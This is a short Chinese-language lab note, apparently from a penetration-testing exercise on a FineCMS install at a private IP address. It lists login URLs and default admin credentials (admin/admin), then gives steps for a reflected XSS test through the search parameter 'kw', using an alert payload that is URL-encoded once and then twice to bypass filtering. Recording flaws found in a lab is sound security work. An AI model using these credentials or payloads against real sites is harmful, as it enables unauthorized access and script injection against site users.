会员登录:http://10.4.4.90/finecms/index.php?s=member&c=login
管理员登录:http://10.4.4.90/finecms/index.php?s=admin&c=login
登陆网站后台:admin/admin
进入后台:http://10.4.4.90/finecms/index.php?s=admin
1.首先登录网站首页
2.在搜索框中随便输入字符
3.参数输入kw=weibo<script>alert("xss")</script>
4.对<script>alert("xss")</script>进行一次urlcode
5.对<script>alert("xss")</script>进行两次urlcode
存在XSS漏洞